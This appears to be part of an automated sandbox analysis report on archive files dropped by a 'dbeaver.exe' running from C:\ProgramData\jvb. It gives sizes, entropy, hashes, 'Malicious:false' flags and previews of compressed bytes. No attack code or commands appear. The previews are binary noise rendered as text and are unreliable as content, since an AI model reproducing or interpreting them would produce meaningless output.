n..u.8...A..PK..-t.b~.......PK........$.cX................META-INF/D
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):52601
      Entropy (8bit):7.9389135514814395
      Encrypted:false
      SSDEEP:
      MD5:75B5F367151F379060518FE9E9870E28
      SHA1:54E63885045E1C1D8C7C1FA4EC5AF31EF0A04E24
      SHA-256:C04BC0C3122F114D8B92BAC7D6CCD8890BDE7E91BBD286F4EAD3EA914E667D8D
      SHA-512:CDDFC2A37D733DF31E2644B57BC279AFE20FD53118AD5161062E1030A52227C7D642984D79250ACCAD7B50F3FA0AF3255419784B1A1E962C045BBD32BB51C4CF
      Malicious:false
      Reputation:unknown
      Preview:PK........!.cX................META-INF/MANIFEST.MF.T.r.J.}.......Ly....T.... .x{I5.b..i..........[...{.z..m`JksHR..v....R7C.W..f%.-.._...`....6....^.i.{jW<....:..R.@@.....b/.5....._....!w/o*jW/.|e.I.Y. .V.J..X...:E..........P.....#-.|..LQ.....d.Z.-.:....R.dMa.A.kr..P.M.>C...>. ..........r..q...k..D.(....|.\..........U..&.....45..+.kp.]...d.2..jM5.L.1.\R.NFqTd.5.{...>..U..H..BD.Vq.:.?7.e i.........r`..|...k...\*..X...y.b....3.....6QuH.~..}.Z.YJ......n....K.;..U......;....>...5..sq.......3.....Q.x.$.3.y...(l......Z.v..h.CU..7.I..(....}E..7lg....}...T]..p.....h...E?g.j..;o*"..O4.G..t..?..._.d...C...%BHM...4....k......\...gJA..P...J..i..._..h$.wa*..^<.x....S.d..7..!.vop.4....&#.........!3.8.(F.....}......U#^.z......'...n.>M..v1a4M....L.!.MyT.<G;.....x..o.}4..YPO.N ..r|..(..N..^...`..nU...].b...........e..M.,........f..~.....*Rgr..alKYu08h.H...I.h.. ..Q...#.j"....a.3.}.....V...*8..p..Q/....2.......}KQ..7...............}..[.S.ww.*..6B.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):98213
      Entropy (8bit):7.871733096398164
      Encrypted:false
      SSDEEP:
      MD5:BEA33F436A4378D22C73BF61330D0308
      SHA1:D2A36F652BEA9093F81E40C2EF2A22EC12662C3D
      SHA-256:B66F196B2ADDEAAFED9D52F39443A5C3BDB0A5F17301F2C65763681765517E18
      SHA-512:5B818B0FD24E603144855E51A2184B3298FB1A9847E90AAC05B4713D49740B7A84C3BE9B1FE955106D556D62E2E9545683397179B2EC09E07CF521D26CF2A285
      Malicious:false
      Reputation:unknown
      Preview:PK........C.cX................META-INF/MANIFEST.MF.YY..X.~w...c..Fw0U. <..l.H....#..$../.r.k.%..7../3..<..^..@.>,A..e.....|..uq.>.....@0>..~..9...C0......o...7|.....A....?.5.Z....0..._6.^^i.e..{....5.._..!..,....:zL.i........{...4q.e..7...;..k}.I...5z..@...<.."/J./...{.-....G./..?Y...5xx^..S.dq.Q..?.4...x..y....Re..._....}....J... ..JsxK...t\.y..7s..0h.'....?:......g;....e..eF2f.yx.".8.o..e]..T......._...L~..)..H..O".?.][.D.a...[...I..n../H..M.W.~2..........{...Y.*.M4....@...?........s..l...g........>.z.Ze]....<.........8.#sd.6H.}.E~...6.Y[.9z....kn..m2...2.?..8*.?)..S..U..1......d^....C..X..^w...".f.......L%.>...,.`.o......l.D.S{.0F._.al...<...."..5........n'......f.0..........">=....b.Y...b...B...SjC%.I...!.v?.e..(...8....W......7.b/+/...y..t...O..bx.J.3.E..*v.C.ZXA.NB.b..jLm.8. ...........2.`......I.D]P.n.L..e5...J...B.V..U..q.cU.........P..l....]....N..V...g...a..*..X....y...A....%.....SD7VFr...!..^..u.-.c..U.;&.[.,7.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):46337
      Entropy (8bit):7.951769115610609
      Encrypted:false
      SSDEEP:
      MD5:A425B8B0A57AC2983E1160BCCD50920F
      SHA1:49AB2CF855BD65C5A5A8808D9A670827E1A59348
      SHA-256:7492ACA9EC74BB42E6CAC1BE8D24B9D5FF9B36F659B2CDB029DB36BDEB12E38A
      SHA-512:13B5721E7E6BD75663F0C5495F0595CDE807AD1FBD1984B77EE6CC7D870D21F4F4BF6FEDCC9978D50AE53FD59229D0D4C1F92E39E5E26ADFED370D770C74CF2C
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.S[o.8.~G.?.yX.brm(.....-..H..T&1...!q.._s.Zm...'....c..h.#.M`.!.W../.sj.......h.`.w..y.Z.EY...'..\.)..... .!.H>..!....Wc...3..W`.z.....zz.V.."a!.L.`.A@BzM.RoI0..OH..-.".7 <P....D."..R.U.a..5>K.%.....S..b.".iL...%...].B..nq.......\....W..MQ.(.38.b.a.......?.i.0.^60.....j.......e...i..\..%`I..)%...x,.......|.......aD.Y..............=\b5.$.j>>$g.kR...G>............N..K..\6!.1...m.j....=q:....Hu.5.'.M[.x....}R.....'.......,0..+....iY....6.._...75.......Ru&....Z.^...T.D.aM... ..Gt..!..O.K...~Ex12;...]..8...z<<...."Y`....i..J.I...|..".Z...T/..Y..I.....5...%..vA.V....y..}.`.8.. $.r..r...O..Y...v..%...:{<.I...\..H...r.(........@....k....#ofe...:[.]L......x.zy..v..t(.z.1.uF.%..Z..u.z.>...9!..m....cI....a....AE.w..)>/.`i-".......?.....2D.V.G..^.c.....l..-...$.,.i2z...G..H.q<.#..;.e_.E.p.2.zb:..2..NJ.}......z....PK......\.......PK..........cX................META-INF/DBEAVER.SF.SK..H..wD...;a...Fl.((*.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):619094
      Entropy (8bit):7.938843916144684
      Encrypted:false
      SSDEEP:
      MD5:6616E33E0319C5E7B775B9BDEC0DF5FF
      SHA1:38F421FFB63AFA78047909410086E44138229D9B
      SHA-256:631049535F7490E71F49CC5D30C181ED33A59C68B90AD781590A1870EBC60F3D
      SHA-512:F4A9530046BE6B99C35E4E6AA5B6FA3402D286D1B9CE86C0F849FA2EC6A99E77050C51C1A6DFF778012ABA66330B80F623AA43B3F799172E89037D574F3D8518
      Malicious:false
      Reputation:unknown
      Preview:PK........!.cX................META-INF/MANIFEST.MF.}..X..{....Acp/4U.=....he.I..A'z.....c.:)e*k..J%).]..+.E.L.a..v.........}...QC......7.............h.![x..8....o....^.a.{R..ot..}...>5.A..&~........a.T...P.....j...J....}t...k..b......K.Uy...n.F..Y.u...F8.....tI..a....};.?L..~.....?.Z..0......-... .?..}2...w....v!w......fH../_.2........6..........y./...1../....I....m..u.....{.x..?z./n....uM..o~..6...ooKc_......=..7~..'..n..&...a..U.=....^?........{?.{../......n.u....S.>..?n..*nR..v..................(.=...z.ha....................................}..x...:.p.....^...n.x..6q.d..u...p..&./.......7..~c..v]....zH....<q.D1...]. M.....).O.....F..QR.>....89D.1[.$ky..f..A.(....IR.T..rC......^..ea.Pv..wFU........ ...vC..E.....(u..R...4w..s...........~w..0..9..;... .X...:.. &....j.*l......ar\.)RC.K"'.8.^<L.I.j....^.{Wk....a..4m.O:...h.(....~...=.....v...Sh....K....8..\.1yQ.2...a>.)..`.TO.R..C{.`/..].x...wwkgyRS/..].k.4..a.C..G.#f|<L.D....m...m..{....\..uG..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):26664
      Entropy (8bit):7.879832925927366
      Encrypted:false
      SSDEEP:
      MD5:670BA7672CA14C72BF3AD4C5D7719BF9
      SHA1:FF0B70B65B582AF71211A5066A072879200783E6
      SHA-256:8002C72195E65487EFE97F9A6FAACC4390AF5B14297C39612D2D1DD9A5017A70
      SHA-512:6CD39A694CE07437BF56995A4CC0D018BC34B9F20E89E6F881ABF0BDD146CF440756C05986D75E7DF1A5BAE9093067FCAFA717EC15EBA0E2D597A8E82383616F
      Malicious:false
      Reputation:unknown
      Preview:PK........$.cX................META-INF/MANIFEST.MF.S.o.J..7..0.p...CD.6&W@[..../..F.AFgF...K...n..p.....@.V.2n..E8z(Ux.XP.(....p...YQ.U..-|(I.$.U.ZQ.K7.....9.........A.C]=D^...x]...AI...p.....-v.up..s+&>......m..x/.|.(.C.2.-F...,^....Mc.B@!.g|...w;"..7..&.ba...D wn....U...u.....QT,...".>.....&.W.>. An>..H.............a...)^.0..Bt.,wrh?..1..aE..'o).....Y..e....~...C...EQ.S...>..;..C...?w.Z..b`w...s...r...X(..`B.&\...L8......2.1.!..X...T.s:.g....8%.>!...x4J...zVlB.x....d&.E..y..|...m.q...M`.....G.i7..S+M./Y..e....c5Z..%........2{.*.=....d.S.N..kl...^.......F..g.......G.....A...xB..q_..f..B}...<.S....S0K.J.....,.........]...x...r<?5V.86.m.].OUi.N..Q..3)...W../w.L~.AGYZ.^c..@.kd'e.0..l.rGi.^:d.7...x.>+....Tg1.+.\..qR.*C.Z.]..z-....U._..W:~.....K;........n....6...0].7.d..t.5..........G3]..vL.t9...~.?..%.Pe.l...h..:.!t.-...,M..[D6...j.6IS..nw..].5#.K{U....PK...j._^.......PK........$.cX................META-INF/DBEAVER.SF.Sk..@..n...c.. ...&UY.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):17862
      Entropy (8bit):7.8904073705029125
      Encrypted:false
      SSDEEP:
      MD5:D96B9A903D65D8148BD3571A276641BB
      SHA1:9BC3182102D79DAE1C42C07ACC3BA841A31B1987
      SHA-256:F5A4F330A338E065882E0F9FFD0CAB0F6CF4258527A6231AC2B9BEB05CA16F38
      SHA-512:1992C7CE46EF02B3AA1D5E7591A0F9F4274DA83123DFDC4D2B1BCAB5A5E20DABE2285AD55B083E8A8C31C49EE6E2FEEF9ED270B063B8A2D5FB64068E965EA69F
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..Ks.@...T...,....%(J...Q.IT..k.JZ.......!S.d......;..vP.7@.....41.URx.W...o.Pt3.X.x.=..L..4tES4....T..L._.*!.p.s.....C.W$~..s&..F.ZB.)...O.n........ 8..Q=...u.a.4...1!...S.?.&8."...y.....P....?~..9D...6.YG..m..D..3=.a)D...ss..8..4....h.....H .^M.G..)./. .U.4fLOd..uZ...]O.eh.#L...X....Bnv/..\.k.[T"wpuY.B.......\.+.|f.%W,.2&W;s..jm.wt.s.....h...S..~...7Y.0n.%.z.5..X..b./Wd+;...v..YT.8..q....y.%...BP...*......P.n~.....Vw+...-.~.;...E.....='w7x.S...p0V3.G.3.w.Pn?..agC.i.|... r."..+.h.j...j.1x..%<...;.<..6...VM.@....PK..5..t'.......PK..........cX................META-INF/DBEAVER.SF..K..@...&...3. -4..Y.%j#.@ldW...(..B._?..&3q.sOr.w.K...x.V......k.g0..bQo;c<x.L..[F..)........DY...$Ps...9w..h!.x.G!.Kz...M.....N.N....4..hYi...t....9#a....g........fA.....!.....R.9..i...5.{..0.J.HiF.Z.C.W`.....[..1....6pl...(.u..g3....H...4....F..Z...c..W.X.[....*o.R..4...Q.f...).r.s.#...6XD..Y......4...w.F....g.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):13642
      Entropy (8bit):7.851461204732992
      Encrypted:false
      SSDEEP:
      MD5:D91CE1795F95C77A04F53599ABCBCA62
      SHA1:4E7EB0EB024302D97C60FA6B2A5A807B811CC239
      SHA-256:F44C7CD4060E7965A97AACCFB65598B9961667419419A9BA98DD98A9DAE61F54
      SHA-512:A8E9F5D4631261962036945270FA82A5A4196C0B3C01B397C142AC6AF9CD1BAB973CF75F4DF4387997694C4ABA006E196AC7D1248E3C06F55D6F64E52663A7E2
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..[o.@...-.?Xy.@.68..#...".H.!..../.............:;3.9gg.".C&.g...#Gk.MU..y.......,v?j....YM.n^6/[]..-........AcU.q@../.a.y...\........a9..s....4..U-.]......c..,3>@...'...UF#.@HD_............&.......R.U.4...C.9..^.....D.)......T..0...g....F....8...HH#.}.2k..w.LF^.Oa.b.T.#..l.....U.."..&........)..J.2*..8#.....U.w...o.c....4...C..V.^.P.U.`f.3.0S....,.1.s@.-v...^...6Te>..V...).g.h..y.=..E...d.R..].......p.X.......IA.rB#c.......va.t..vZO..0.t.e.......p..m8v...{..@.........e...........H.?/FV......J....PK..'..g........PK..........cX................META-INF/DBEAVER.SF..;S.@.....?P.8p.C..X@.J.0...u.\..x.8^.....ca....;.....>f.)rCP$y<Z0.8.D....$K.p.e..B.......)N.h..W\tQNN.0..4..e..i.|t......|....l......w.b.Ar....2......tb_r.....)J6..4.'Z..#..=U...U..@..<.aC(X...T........8..0..........8..%^...K!EU.s.!8.I...X.u......C.!X.2k.m....Nb..o.JZ.$....&..%..#..(o.~...[.vN..=^..j.:.......\.....#.2.B......<.5].F..s.-.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):36938
      Entropy (8bit):7.928250187500561
      Encrypted:false
      SSDEEP:
      MD5:D0B1A33A4167B56170A6680807E8C3ED
      SHA1:15BC5BEC461418319DFA49DFC41BAF1CCE70B098
      SHA-256:3D174D587C274981F6DCEB829930470AF95817D5D609068E80642721F2FACC86
      SHA-512:F8B99C91C986919CA14583897128862BF1ADDD6C0D90F29E4917E499FC43FB888C17AE976004FC3C914A898443E12D8BC0DC6473570AB67F849C7B74B1CEAADD
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..[s.J....?X.p*)...}....z...u^..iIs..n@.....d&f...k...F.0.A.s..2Dp.R.k.......E..R.G!.W..F.&..z....99.W..Z).<"....V..wu9.N.9.|.7.Os....0.X..........?5\.f..$@..E..{>b..a..<d...n..4.i./.|....?..4K.@.AN).].7.%.'.B.,;.!.P. ...<Mp\.....B...^.U....R...H F.....O^.H..1..B_3.#4.<.O...._......kX.O.rIJb....i.I.;.(.W.wVd.(@q1.a..!..+.......?7...J-sx{.....;....r.....E...\2'..h.9...}.+..E..{.f...U{.R..-....4%q..=.............. .S...G....D....]).=.m@G.......KQ.C.fJ.....<1~...&..7...e)5Z.F..H.v6eBW4...},....)v .v <.@(v.;W...)..2IB.4(I.S..ByPH.....kD..*..,Y.`........;.[..........Fv.z...b..a.2<y.ZJ..W..;.......s{D........R.k....(.\]N.kI.`<!d..'E....TV..k_@]gh=.~......1....W[..L;,......:Z.c.......F=.oT0j.....*.C.~....[..4.....&.)...!.w8..Cx..........%.....~.$C.k.f8o}.{}|...u...!Bu}.@.$..#....k.u..rm.......PK...~..N.......PK..........cX................META-INF/DBEAVER.SF..K..0...H..X.. ..0A.....!$.6U.&...l'.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):136024
      Entropy (8bit):7.870068341422807
      Encrypted:false
      SSDEEP:
      MD5:A57DC8EE388299A77C6590EAEC689EDF
      SHA1:94BC56DB975EA1C6F98786497FCB7DEA4CEEAC32
      SHA-256:1EC139A4BD38B74604AF6C96C9059D40AB0825F2A6EB15C42E889ED5D6F5C8A8
      SHA-512:5B1AD753B78817F659F2A3B2070D71D6C87AFD68EA6BBA9F28BB280D7D2F6F49E151C6C191A54D9085FBEC579D16325DA106F71E6FF6B934C120DD910E4651BE
      Malicious:false
      Reputation:unknown
      Preview:PK........C.cX................META-INF/MANIFEST.MF.ZY..H.~w...c...th\......&.!.&$...&V.b._?..\v.E.U].A/.$..s..fn.,:.U....*.?>Aw...T...g.K>..N...1#...|.A.....0.qv......9....]...@..]..O.T.y..y......._.}..C}.....U.~..O.......}....].DUu.u......WwM..*...-.....Z.........e..]....(O.F..&.:j.:/_.q.p...>~..k........4**........h...s.,...?.D?.4..{~.....>.Vz....UH...o.....4/..ze......I.J?.s&.<.Rf.Q. .khZV.........H.y...J6:/..?...h.....v:'|..5.B`.8_.|.@6u~.f.....<...6|.>m....Q=!.`:....dN~........q.O.nm......k..........?<.W.M.ew.%..A....r........M.\sn.S.a.Z......-..O.'.\..?...~[q:..............&..<O+.........7.a&..<.mR.r..=.~...}P.n..].$.ek.x..JyRP..j.Yi+..Lm.w_1.O&....4.D(3#U..IN.N.-...T....c8iiZ4.C..~|.t&.=G.#.-O.G.......B|.f.S..L..9GHj.....2.....%,....DMV..II3. ..D..-.<.8.. W.v..=_.F.w(A..lj.[......2..V.E8..g..k....8..W.9XE...... .-.%!4.FX.o......t~..7...{S/.4wJ.&v....x.&.....bR...6t.\p"8....._E.....e^.e...l......K...;~..@t.dv...q.oQ.q..R.G..ly9'.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):348162
      Entropy (8bit):7.944511877523391
      Encrypted:false
      SSDEEP:
      MD5:261E66CDCFB8F7D00D279919AB36FC91
      SHA1:60AF79570088B89170FE1B0648CC68AEA3CD9FE4
      SHA-256:8A0FB6C1813C3A130D729C3601CE507B33196E359583ED4E6868900DAF4E1374
      SHA-512:93F4DF09B6EF863BD90EA19DFA0F3C25A4128A0ECC065C9887C53285E66719717BC3871BDFE7B658040791E1E01BA79BECB1FE7A17478E2481E1A573B0F807AD
      Malicious:false
      Reputation:unknown
      Preview:PK........".cX................META-INF/MANIFEST.MF.{Y....{K..ZG......qo.t1`3..f|.b..<..83kN....Re.Y.bE|..`.q.7.'......c.....}...'.~:...|....%....XCk..@...~........s|....q..oD..........$<..u...K..{E......W..E]~.x.o.|.D.vS....._o9O.S...xkQ...k.4..H.......4q..~...w[w.w"|S......y..w)~....\6.U)........n.,zH.y..7....?=..(..q.....?.]..z.._/.M...<\...?~.XvS......8...k...n..W-<..9...?.......g.yvk.d...]...W....4..F....wm.-.r?-..}=.N....&.'.v.v......(.c..6E..o..../=.m|..l%..{q[..K...Zy..I_..l.....9-..3.-O....w.z9.o.E..t...M.........._..........{.L.._............o............em.qm.I1......n.{v..r.......p9...;...5.~".p.......L.........`..&.)N..i.<..GQ...7....'q....L..#Q.]..v..CA.j.K_./{t.j.Q..<..t.=n..h..4~BH.;1......>Q..x..+.O.@.$pV...m.iX{.R].M..0Y.o../v\?mM..Ax...B.....b..]9...)......L{)K..........r.....0......J..e[i`N>...UO..\i...}.l7.....GD..d..{........u....[.8rNK.t|....w^].$.....U...L..oa...E....LF...h.~.u&x.*..Z.N6DL..R...mg.g7.3......Zs.m
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):120910
      Entropy (8bit):7.9427296871374695
      Encrypted:false
      SSDEEP:
      MD5:D4DF51B8B13ABEEE96695C6D5969C333
      SHA1:CDAE49A4483AA9559D7F7911B2263A6A2808BCFD
      SHA-256:47CB12B1F4F01852BB253AB7C51B132A7518F517545A9F994F0B590083A1FABB
      SHA-512:31D6D8E821DAFAF3E712AB389AE0BB976ABB866649838C2B5714158279BBCA972CCEBB9D8CE4CF0FEBE6371DCA1FDCA2C8498FCFB01D40B6CB60925A5DE092BA
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.Xio.V...).!..W.h....T#..1.....e.r.7../..d..8i2......9.Y..4pAY...(.,.p7. .7t....D.Z..q.......p."....lJ......c....$.no....p...u...^.b..0...l>.X.....XA..I...MZ.XY..7g.7...,'_M...._^...R/..h.cU...#...(9.'..]*..Y........F..z.p.y.g.......;+....j...;K&e.N.....I......7w....$.|......)(..."eWAcV#..A.Q.....x.NV|....G&6.R1+........,..d.z.O.xY.oZ0fnZA.T#.......cx...._~..o_.>.fcj..5.=.qJ.../.7.7O..Gs..s.h..j.~..~..z|\. v.>.U..r{...{.'.7F.;....kWPX...Z.#....8............}..!.k/H'].?...RsU.........G..2.I.QC..\.s:....5+....).b0&..Z_.....>.E...U.Z......Z..e..D.JWJ...gm..L..(.b..u$4E..u.%......B....T.k.4@....C..t..H.&...u...u..S.q.O..$ ..3...'p.*..7...l..".n.....nvbD"....bS;..z7\.T.c....,8A.sa.0w....Ax.5....:u..U.4.....0l5......O....3.S^}..I^d9(....X.zUaf'..C.tB.1.......[k.x6D.....S....J..6.T.@Y4E...v..B...e.........b.....}...5.$i<.R..w..LA....`.@..*.,.]...z^.o.<..S....J.5.s]..P1q.. .mw.U.K./=.dk..{6s.......a
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):17810
      Entropy (8bit):7.860378598237354
      Encrypted:false
      SSDEEP:
      MD5:933BACC05FE2C46BEC0A15959151A66F
      SHA1:14B506D1F22E375A92D60BE4A3767E92B17F4543
      SHA-256:CAA1AB4423CAF0A09306BE932C9529AAE2A27F039C6253E384A7F72F631B32E6
      SHA-512:453D97ED80F81C4FDDF91E0729C027225D25DC71E1DE6FED1F12B56CA89FA6C4CB0D1057D1799CCF1B361826C4414C25C43B49535D11F463DA7939F89672429E
      Malicious:false
      Reputation:unknown
      Preview:PK........E.cX................META-INF/MANIFEST.MF.TKo.0..#..P..V4Oh).8.,.@.BK..qLjHbc;@..k..v.R%........ ......$*e.UO..1.<..f.K....!6.!*eL...9=g....B.&..7F`...I:Uc...}.W......#...c..6...&.:.!a.1.......!d...&..n..I...a.:.a...<Z.uW..y.<t...8..$$.LT*...c.ScT#.S?k.........|.'.N..<..).k;N...r.......C*.#!....].c.._2L........g9.i.....XE....c.9?.I. ..Tc..^.....Gv.].@..@H{.....`..X.y.}lB.0.NUbAdK.........0...`..,$2..~O..#V*_]......X..qs...B.(..\.S.......#u....(..R.\.R.bhM..5.t.....o....[fN.)N.........R......hR.......N..U......1.)&*..._iM:6I:p.[.1,.E..mPs..X4....5(h5fk...j$..D....7.....i.q..zN.z...fQ.S.p..2.a...n.`n./.H.>ri.#......Y;......].=.... ............K..y......B.G......}"Zo..L...-?&.N.;.%/..L..|p.O.sIv...E...sF.A.1...w,I.l.nw..F..V.....-..PK...q......z...PK........E.cX................META-INF/DBEAVER.SF..K..0.....L..<4...... ....(.......$....rwz...KO.2G..1..!n..-.oS~<.1....m..y.O......m2....Q`...(M.2.-.8...-..c.8....wQ.x../.............of..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):46951
      Entropy (8bit):7.824585986017266
      Encrypted:false
      SSDEEP:
      MD5:D4E5EC6DC1A541E55AEB396F260FD0C3
      SHA1:A06BA2818C3E98364768A90997D18353334C618B
      SHA-256:4806DE3C7D16D21F399995DF9A602380E61BBA1880EE151598D771C294C94A53
      SHA-512:683AA412F277A656BBA70219195733C731BB958D056492F2424B49340C412543D92F786362FD9C3D24E20B41403CDE52C430BF48FABDDDFFCE4CA2FE70FC21DD
      Malicious:false
      Reputation:unknown
      Preview:PK........C.cX................META-INF/MANIFEST.MF.WY..J.}....7&.....*.sc..@PvD.e...b.U.......}..#.Y.'O..*8#....]......wX.....0....w.#......C.........`..w.._.l..%H{0.............t......&..1..... .)..6...N.F.J..q....q..<.fY.)....W..2.9...d....a~.......d..#..y[.3.....$.LA.......x.@.S.K.(oY..w...".@v6....d..u..........Y..l...l#.B........k......M .e.k....,.G2r...F..@....a..Y.ly...F:;.m.."....:..w0,......H..=e.......K.8.M.Y.9..g.L...F..L..e...h.....q.".Y......2..w......2<....!....fQ..4....U.....I..a...r.]<..k..E.3.h.0.y[O.9-[..V.9H.~....>?.}c..P._>.....6............c..A.C.bU..n.'.s.....+....lNKZ6G@]N.u.)..N#.6..X.B..K.c;'`.......s.z....^?.O)Q.+is....L.P.Zc..*.......B..BZ..G....\DF.<.*..`.Y...;.s....{.xx.).&..R&x..)7.......[..c.G...jl....#{.H......}.S.v.`.7.-/82c.....$..p.5..J;.....f..D`..J.\2.kQ;.L.r....O....l.....k.f[qv....,.t.l....I3.......&CW.eK...U........D...y....2# ..({s....ErE'\.. .........m..q.=.Q.`.V....LM...4|..,.D.q..qs.m.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1082321
      Entropy (8bit):7.9797559119936
      Encrypted:false
      SSDEEP:
      MD5:937F80589AEECC0949B4A2F2B66F4D52
      SHA1:F6082852B4CD6922DC4BB8F9309E597BDA2D90EA
      SHA-256:C106C7F72D8A30F019067B7912F44AAD522A233D797F6516F4424D96D0C424C5
      SHA-512:D64830CF8970385DB4EB14F876CE713CBD29B63A24969A5D22CC4E6051732B0B99BA69410C48DD2A5C125F98C6561C7E9319BEC191A4C3464648647E4C7FB030
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..W..h..z?.......^.i.b..Y....)..s.o..9.b..[vw.eK..x..Q%}.M..K..,...w+..........QSV...a..F...._?3.*..o0....!;..........B?.nQ.)k..7...1..~NMuXF.....uc..$...G..w~;Eu.g.oJ9%.g..O.k.7e....O>.E6....+Z.O.....!..2....s.....6..|.w../..SZTF...~.......M..)......g..2k..S...~...{......0*.........o...}.-m..>.).../}....>%..u....S2y7...~.....?t....'.....U.......=....1>...o}.].$w.<..P.h~.R..._i@.cv..;...D..T.m..B.a..c............^...<y..~{......0{F.7k.A..W...U4z...W=.....o.46.....b.N_%..#|cK.N.?..fH.OQ.?.]R....._..........Yt.....a......._.......n.]...R.)....al..1K....f..R1%;g.J.K......nk.h.>.\..6..w....V.;c.)...........:.{09.[#.....>..Z.R.e0X..=.d.../......8...../.w .y...M.tf...(.)*.w..-....d.e>..;..g..s..W..>.k%.G.......}.....:.&.pe.^A..&.}p...NI.......T...\O*..+P.....*.Y.'.V....w..._"nUt6F&...c(...Y. .9.".....v..S,.,|.z..;..M.op.Vu~u..<2..v.}F..y..Gf...,.../?K...4..B./......QT..4LT....b..........~.&.Oa.....)L`....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):105034
      Entropy (8bit):7.943753389732387
      Encrypted:false
      SSDEEP:
      MD5:2300E7914531F330F0ACEEAC7DE4DF3F
      SHA1:D491CF76823D869A5E88FDD1809DECF3CE37752E
      SHA-256:D980217A06CF7C998558E55FE4D64A5692C9FFB1261520643E0076A808A46AF7
      SHA-512:E7D80ED0786AAD1BC8BFF6E75D9323215F336A785F601D242A89D9966C25DC2D2B00519097977EC918F96630707A8581DEED5BAC5670CCBCA7FBE603F4244475
      Malicious:false
      Reputation:unknown
      Preview:PK........3.cX................META-INF/MANIFEST.MF.X[o...}....}..Zqb....S..6.`s1...T..0.._l~..N.m..I.,..a..k..g.........r.G.w..v{.0t..'...`.........p......}uq....-.*.u`|{3.U..q......-_...S.u.1f...q..Q...;1v@xY....8....8s;~...d.......9.......EV......t{D.W..T..+...........f..q.K(.'...2..........d.~...l..E.^...%m.......DL.{h5.g.FN.. v.g.er.Zy.X..p...c..as...N.8...&h.."t{^r{C.E.oW..mx.K.....FVbma...n.......VO {.....|.>.U.*Kc.|.....K|.........z..~.....=..7z.f{`o}.<...A.FV;.Od..hS..7.........Fb.$....S.+>r."...40_..\..r.......Q.....d+=..e..g.^......R..........M...|}...%3.....|:?..>.L...~L....t.H]q....v..c9.X3....\.q9.Q....y...w.~...fRF-X.......n`.F7r...7...Z.t.....$.J4!M...3......`..M..^rL.6.,.!......:+.....rJJ....<+..6..(...l@e."..t>......<........f..y.U.Rz.K.o..I.8.Y........1.E.;r........c,E[.g.K....a..K...V....1.*......^.3MYo.}\.V....@.N.Y.....3..n......-t..;t.....:...3,...A./..5...g^...`.n.9i....&..a2L0.TTvN.8....._.]..\ ..C..........y
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):39339
      Entropy (8bit):7.898335588825928
      Encrypted:false
      SSDEEP:
      MD5:FF8035792F536A19F15311C7456DF349
      SHA1:C69C58B9AFC9A17B408E63EF79EF41CF10ABF874
      SHA-256:F2E971ADA1DC9783415D3401BC99AD016679297CC6B03D33941C6624A6A6C7CB
      SHA-512:7FE3D05ECE5B9DB1E6DF0A29451D3E3E339690327D3B6A9D1A13B09C25791EB4A4D1984A38AAD64726652FCE9851A7453A222830BEF0C2677DF16B92F2C0E5A4
      Malicious:false
      Reputation:unknown
